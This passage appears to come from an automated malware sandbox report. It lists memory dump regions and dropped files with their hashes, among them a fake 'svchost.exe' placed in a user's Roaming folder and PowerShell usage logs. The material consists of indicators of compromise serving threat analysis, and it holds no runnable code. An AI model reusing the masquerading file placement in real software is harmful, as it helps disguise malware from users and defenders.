| SHA512 | 54b47140ef4cf71f850e0852c66f01960c312f5c2bb476550d18bb1f5a3640f6eeb12b867d4057cd3d7c353820af2815fea5bb999cfcf6ca81d6e4882efbbf1f |
memory/812-274-0x0000000140000000-0x0000000140848000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
memory/812-269-0x0000000140000000-0x0000000140848000-memory.dmp
memory/812-267-0x0000000140000000-0x0000000140848000-memory.dmp
memory/812-266-0x0000000140000000-0x0000000140848000-memory.dmp
memory/812-265-0x0000000140000000-0x0000000140848000-memory.dmp
memory/812-263-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4600-257-0x0000000140000000-0x000000014000E000-memory.dmp
memory/4600-256-0x0000000140000000-0x000000014000E000-memory.dmp
memory/4600-255-0x0000000140000000-0x000000014000E000-memory.dmp
memory/4600-262-0x0000000140000000-0x000000014000E000-memory.dmp
memory/4964-283-0x00000000060F0000-0x0000000006444000-memory.dmp
memory/4964-292-0x0000000070890000-0x00000000708DC000-memory.dmp
memory/4816-308-0x0000000005E50000-0x00000000061A4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | aaf7b04e5be4bb88401156f4d8f34761 |
| SHA1 | f75e2c47377abdf27b1e2c4e73e69c5bff3e5171 |
| SHA256 | bf36186c9d6f77f6c8e2a728acea18d88c3e57de96724f4da7bca1c3068286a1 |
| SHA512 | 3ca79af34fbd2b1167dce18e33ccb0c16f40f9306c27242ac878c60892ef2c01f2b6af4e01d3f0c251a54ab27b4228eab0bed0927a5fa0f8c09efb431c58ad56 |
memory/4816-314-0x0000000070890000-0x00000000708DC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bcb4bbb1531c93c8bb72dfe947c111a7 |
| SHA1 | 8dd388d15f8d0f39de79a248682b67a0617ea069 |
| SHA256 | 0eab3d15bc1e82c559b068f396928633378e07dc299fbd8d54e6517e615131d0 |
| SHA512 | 8a9964419f1aea9a06c692619c545089394407b0ca742611e1389051f69a2f432294e032ae8c53a5282b69f7dfbfe251fb8634f2898b5615c2dee741187a5f89 |
memory/1976-335-0x0000000070890000-0x00000000708DC000-memory.dmp
memory/1248-350-0x0000000006A60000-0x0000000006AF2000-memory.dmp
memory/1248-351-0x0000000006460000-0x000000000646A000-memory.dmp
C:\Users\Admin\AppData\Roaming\svchost.exe
| MD5 | 8fdf47e0ff70c40ed3a17014aeea4232 |
| SHA1 | e6256a0159688f0560b015da4d967f41cbf8c9bd |
| SHA256 | ed9884bac608c06b7057037cc91d90e4ae5f74dd2dbce2af476699c6d4492d82 |
| SHA512 | bd69d092ed4f9c5e1f24eaf5ec79fb316469d53849dc798fae0fcba5e90869b77ee924c23cc6f692198ff25827ab60ad47bb46cadd6e0aadde7731cbafb013be |
memory/2972-354-0x00000000005D0000-0x0000000000610000-memory.dmp
memory/2972-355-0x00000000052E0000-0x00000000052FA000-memory.dmp
memory/2972-356-0x0000000005760000-0x00000000058BA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log
| MD5 | 0efd0cfcc86075d96e951890baf0fa87 |
| SHA1 | 6e98c66d43aa3f01b2395048e754d69b7386b511 |
| SHA256 | ff981780f37479af6a428dd121eef68cf6e0b471ae92f080893a55320cc993f7 |
| SHA512 | 4e79f5a8494aac94f98af8dbbc71bdd0a57b02103757ad970da7e7d4e6a0dc5015ca008256a6bd2c5bdec3a0f5736a994e17b3ef004b0f374a3339e480ac41b1 |
memory/812-361-0x0000000140000000-0x0000000140848000-memory.dmp